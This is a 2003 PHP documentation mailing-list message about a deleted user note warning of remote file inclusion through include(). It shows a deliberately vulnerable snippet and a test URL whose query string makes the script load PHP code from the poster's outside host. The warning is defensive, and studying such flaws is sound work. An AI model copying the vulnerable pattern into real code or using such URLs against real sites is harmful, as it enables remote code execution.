note 29234 deleted from function.include by vincent

From: Date: Mon, 08 Sep 2003 15:02:53 +0000
Subject: note 29234 deleted from function.include by vincent
References: 1  Groups: php.notes 
Request: Send a blank email to php-notes+get-55833@lists.php.net to get a copy of this message
Note Submitter: raz0@NOSPAM.worldonline.dk ---- The "Editor's note" to "fekalius at web dot de" post mentions that the code can be a big security risk. I want to stress that it is a VERY BIG security risk, as a malicious could send un-parsed PHP code. Dangerous code could look like this: include("$file"); Don't think you are safe just because you use: include("./php/$file.php"); It WILL make it harder to "hack" your script, but NOT impossible. If you want to be 100% safe, use something similar to this: if (isset($page) && is_file(basename($page))) include(basename($page)); If you don't use code similar to the one above, a malicious would be able to use ANY PHP function. This means that he/she would be able to delete files, create new files, maybe even execute files etc. Try creating a new .php file containing the following code... <?php include($_GET['page']); ?> ... save and upload it. Now run the script in your browser with the following query string: ?page=http://raz0.zalon.dk/safe eg. http://www.somehost.com/script.php?page=http://raz0.zalon.dk/safe Hope this helps someone :)

« previous php.notes (#55833) next »